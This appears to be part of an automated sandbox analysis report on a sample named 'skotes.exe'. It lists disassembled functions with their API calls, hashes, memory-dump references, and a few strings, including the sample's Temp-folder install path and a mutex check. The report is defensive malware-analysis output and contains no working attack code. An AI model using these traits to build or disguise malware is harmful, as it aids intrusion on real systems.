                    • Opcode Fuzzy Hash: b36ae6f94d372ff64b4da89c0af13a455d4f54d85b457d19ac11513aadbc6f32
                    • Instruction Fuzzy Hash: A25105B9988345AFDB24AFB498A0A6D7BA5EF02324F15417EE924971C0EB32C600CF55
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0219EA3E
                      • Part of subcall function 0219E7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0219E7DE
                      • Part of subcall function 0219E7AB: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0219E800
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0219EABB
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0219EAC7
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0219EAD6
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0219EAE0
                    • Concurrency::location::_Assign.LIBCMT ref: 0219EB14
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0219EB1C
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction ID: 8f8ac87ad58ee28f564f78ede00c7b1fc1835e4167df2bef9d42e6ae5433cc5c
                    • Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                    • Instruction Fuzzy Hash: F3412B79A40214AFCF05EF64C494BADB7B6BF48310F1485AADD469B281D730A941CF91
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0218F0CD
                    • _SpinWait.LIBCONCRT ref: 0218F123
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0218F12F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0218F148
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0218F176
                    • Concurrency::Context::Block.LIBCONCRT ref: 0218F198
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction ID: da3c5a15674356b8d43d6b34c550d6b1a7a6bb808bf5cb15f33e119ab879bef0
                    • Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction Fuzzy Hash: CC217F709802199EDF28FFA4C8856FEB7F1AF05314F90061AE065A65D0EB718646CF91
                    APIs
                      • Part of subcall function 021AF30A: _free.LIBCMT ref: 021AF32F
                    • _free.LIBCMT ref: 021AF390
                      • Part of subcall function 021AB05C: HeapFree.KERNEL32(00000000,00000000,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?), ref: 021AB072
                      • Part of subcall function 021AB05C: GetLastError.KERNEL32(?,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?,?), ref: 021AB084
                    • _free.LIBCMT ref: 021AF39B
                    • _free.LIBCMT ref: 021AF3A6
                    • _free.LIBCMT ref: 021AF3FA
                    • _free.LIBCMT ref: 021AF405
                    • _free.LIBCMT ref: 021AF410
                    • _free.LIBCMT ref: 021AF41B
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction ID: 52647b60292ac135fea97c9efe75b0595d4c597ad5e22b41687288303070ec48
                    • Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
                    • Instruction Fuzzy Hash: 24118476580704EEDB30B770DC26FCB7BAE7F00710F404916A699A6891D77AB505CE90
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,02193E4D), ref: 0218FCE6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 0218FCF4
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 0218FD02
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 0218FD30
                    • GetLastError.KERNEL32(?,?,?,02193E4D), ref: 0218FD4B
                    • GetLastError.KERNEL32(?,?,?,02193E4D), ref: 0218FD57
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0218FD6D
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction ID: 1dec9edcc9d024e2505782af26b49f46f0614fa12b2e22c76ee9e76c47c37fde
                    • Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction Fuzzy Hash: DD019B39680311AF97507BB56CC9FA737ACAA04B52B640637F901D21A2FF79D4048F69
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 02187138
                    • std::_Rethrow_future_exception.LIBCPMT ref: 02187189
                    • std::_Rethrow_future_exception.LIBCPMT ref: 02187199
                    • __Mtx_unlock.LIBCPMT ref: 0218723C
                    • __Mtx_unlock.LIBCPMT ref: 02187342
                    • __Mtx_unlock.LIBCPMT ref: 0218737D
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction ID: 7dcff6384f871eaa337161e78e3cc8ada6736911119e2a3fedb452d0e571db67
                    • Opcode Fuzzy Hash: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction Fuzzy Hash: ABC1D074D807049FDB25EFA4C884BAEFBB5AF01304F20456EE81697691E735A505CFA2
                    APIs
                    • GetConsoleCP.KERNEL32(?,02178A07,00000000), ref: 021AFF6F
                    • __fassign.LIBCMT ref: 021B014E
                    • __fassign.LIBCMT ref: 021B016B
                    • WriteFile.KERNEL32(?,02178A07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021B01B3
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 021B01F3
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 021B029F
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
                    • Instruction ID: 3895d7b3a651941412044b2f9c5b119b4ccf95f935f772edd1a2932c41f71f6a
                    • Opcode Fuzzy Hash: aeaffaf03d6c38a690940c40d1bea6644629eb38ec1b3c0d319535d1d52f1a6c
                    • Instruction Fuzzy Hash: FDD1AC75D002589FCF16CFE8C890AEEBBB5BF49304F2841AAE855BB241D731A946CF50
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0219EB85
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0219EB8D
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0219EBB7
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0219EBC0
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0219EC43
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0219EC4B
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction ID: 9880dc77d184ab4d94ba27aee8b02b6c806bb10302fecc9387ce33443924c59a
                    • Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction Fuzzy Hash: 49416239A40619EFCF09EF68C894A6DB7B6FF49310F04815AE81697790CB74AE01CF81
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0219A2D0
                      • Part of subcall function 0219B7C7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0219B816
                    • GetCurrentThread.KERNEL32 ref: 0219A2DA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0219A2E6
                      • Part of subcall function 021905EF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 02190601
                      • Part of subcall function 02190A7B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 02190A82
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0219A329
                      • Part of subcall function 0219B779: SetEvent.KERNEL32(?,?,0219A32E,0219B0C2,00000000,?,00000000,0219B0C2,00000004,0219B76E,?,00000000,?,?,00000000), ref: 0219B7BD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0219A332
                      • Part of subcall function 0219ADA8: __EH_prolog3.LIBCMT ref: 0219ADAF
                      • Part of subcall function 0219ADA8: List.LIBCONCRT ref: 0219ADDE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0219A342
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: c32d5f2f472a4de5708b72d0894753d5a0458148f7f4d346bf7707cb4d0ce7fe
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: CE218C31500B15AFCB24EF65D9909ABB3FAFF487007004A5ED84297660DB74FA05CB95
                    APIs
                    • GetLastError.KERNEL32(?,?,021A5195,021A3D59,0218B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02172691,?,?), ref: 021A51AC
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 021A51BA
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 021A51D3
                    • SetLastError.KERNEL32(00000000,?,021A5195,021A3D59,0218B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02172691,?,?), ref: 021A5225
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction ID: 5d1e020a4963659f3ddecab2bce5ddbfc86f00c7c723df49d489fdb220f6b25c
                    • Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction Fuzzy Hash: 2801283E98C721BDA71527757CA4A2B268BEB00774724023AF628450E1FF914805C544
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0218FE90
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0218FE96
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0218FEC3
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0218FECD
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0218FEDF
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0218FEF5
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction ID: 00f86a82635bac83e20d5e36892c47a4f61198a76e1445a49eb9ad7468d552cc
                    • Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction Fuzzy Hash: C201F73B580205ABD710BB79EC88BAF3768EF41712BB10825F419E2892DB28D5058F64
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021B29C3
                    • _free.LIBCMT ref: 021B29B1
                      • Part of subcall function 021AB05C: HeapFree.KERNEL32(00000000,00000000,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?), ref: 021AB072
                      • Part of subcall function 021AB05C: GetLastError.KERNEL32(?,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?,?), ref: 021AB084
                    • _free.LIBCMT ref: 021B2B7D
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 2155170405-1765908331
                    • Opcode ID: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
                    • Instruction ID: 221001ad200cc9b09eace085b5243ec3fec5b462f2f7d2996802ced65805a3dc
                    • Opcode Fuzzy Hash: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
                    • Instruction Fuzzy Hash: 26512871940215AFDB22EF74CC809EE77BDEF45354B15026AD820E72A0FB709A49CF55
                    Strings
                    • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 021AE24F
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    • API String ID: 0-2895844383
                    • Opcode ID: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
                    • Instruction ID: 0e116c3f1b7c6279b3e6f376e4ba1e8abe375c85596ea007def02d1bbdc69c1a
                    • Opcode Fuzzy Hash: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
                    • Instruction Fuzzy Hash: 89219279684209AFDB20AF719CA4E7BBB9EEF003747004535F93996190EB31ED51CBA0
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 02199F03
                    • std::bad_exception::bad_exception.LIBCMT ref: 02199F65
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 02199FA7
                    • std::bad_exception::bad_exception.LIBCMT ref: 02199FD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID: 8[F
                    • API String ID: 3836581985-331943168
                    • Opcode ID: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
                    • Instruction ID: 0ea26dbaff41a124001f7fa28e1fb0ec8dc2ec4cfbebe76f34855359e71304e7
                    • Opcode Fuzzy Hash: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
                    • Instruction Fuzzy Hash: F121DE35980208DFDF05EFA4D885A9DBBB6EF09310B25402EF415AB290EB30AE06CF55
                    APIs
                    • GetLastError.KERNEL32(?,?,?,021A6BB1,?,?,?,?,021A78C8,?), ref: 021AA8DD
                    • _free.LIBCMT ref: 021AA93A
                    • _free.LIBCMT ref: 021AA970
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,021A6BB1,?,?,?,?,021A78C8,?), ref: 021AA97B
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction ID: bd484ce7ec91a558afbd8283e30d42b5ed5c0839e685c2289ac27f4bf489b9a2
                    • Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction Fuzzy Hash: 5A11CD3E2C86407ED6112A755CB4E7A157ABFC1779B270235F225921E0EBA28C05C565
                    APIs
                    • GetLastError.KERNEL32(?,?,?,021A7862,021724AE), ref: 021AAA34
                    • _free.LIBCMT ref: 021AAA91
                    • _free.LIBCMT ref: 021AAAC7
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,021A7862,021724AE), ref: 021AAAD2
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction ID: 00541a599f10267d0e695f937ce0462e089f2c98dab74ab749e50699e15f249c
                    • Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction Fuzzy Hash: 6311E93D2C87017EDA1166795EA0E7A23BAAFC1778F150235F22A921E0EBA28D05C555
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 021A231E
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021A232F
                    • StructuredWorkStealingQueue.LIBCMT ref: 021A2365
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021A2376
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 06193180b3d38229ec85517ce7267db5b59856b7b52870c6fe1d4fce0e4ff75d
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: 401191391401059BDB19DF69C860AAF77A9AF1B314B14C169EC169F211DBB1DA05CFA0
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 0217ABCA
                    • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0217ABE8
                    • GetLastError.KERNEL32 ref: 0217ABF0
                    • GetLastError.KERNEL32 ref: 0217AC01
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CreateMutexSleep
                    • String ID: T2F
                    • API String ID: 3645482037-3862687658
                    • Opcode ID: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
                    • Instruction ID: b7075e09aa1905e7e74a1e9cfba2cc8943cbe4a19e25c76f985b40c2797dd914
                    • Opcode Fuzzy Hash: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
                    • Instruction Fuzzy Hash: EE01D131680344EBE7109FA8FC08B5E7779EB85B22F200A35E515C71D0DB78A948CB59
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
                    • Instruction ID: 0f576279acae1cd09fba469dd989de0f29620e8617cd74c7834f3ee9cbede585
                    • Opcode Fuzzy Hash: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
                    • Instruction Fuzzy Hash: D661A570D44718AFDB14EF64CD89B59B7B5EF44310F1042AAE90DA7290EB74EA80CF96
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,021A714D), ref: 021A723D
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 021A7297
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,021A714D,?,000000FF,00000000,00000000), ref: 021A7325
                    • __dosmaperr.LIBCMT ref: 021A732C
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 021A7369
                      • Part of subcall function 021A7591: __dosmaperr.LIBCMT ref: 021A75C6
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction ID: 2c0ce0347a30a4ca305ef7ffd02c2863a0ce96714d5448918467050e3554863c
                    • Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
                    • Instruction Fuzzy Hash: 97413A79980704AFDB24DFB5E8549AFFBF9EF88300B014529E956D3290E7309A42CB61
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0217BCBE
                    • CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 0217BCDA
                    • CoUninitialize.COMBASE ref: 0217BCE8
                    • CoUninitialize.COMBASE ref: 0217BDA7
                    • CoUninitialize.COMBASE ref: 0217BDBB
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Uninitialize$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1968832861-0
                    • Opcode ID: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
                    • Instruction ID: 57a3d26872fd1542cb16ea782fca7fd3d9758892326bec47cc8d7b0b1979a4fe
                    • Opcode Fuzzy Hash: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
                    • Instruction Fuzzy Hash: 2D419031A44209EFDB08DF68CC89BAE77B5EF88719F108158F415E7291DB75EA40CB94
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0219DDCB
                      • Part of subcall function 02199196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021991B7
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0219DE2A
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0219DE50
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0219DE70
                    • Concurrency::location::_Assign.LIBCMT ref: 0219DEBD
                      • Part of subcall function 021A1599: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 021A15DE
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction ID: bd4fb7c0d65b9da6d7a0f39f5c1159b955a090eee73f03d6064321e7dac9a932
                    • Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
                    • Instruction Fuzzy Hash: 6E41C374680310AFDF19FB24D895BBEBB7AAF45710F144099E8069B3C1DB34A945CB91
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0218EF54
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0218EF7E
                      • Part of subcall function 0218F644: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0218F661
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0218EFFB
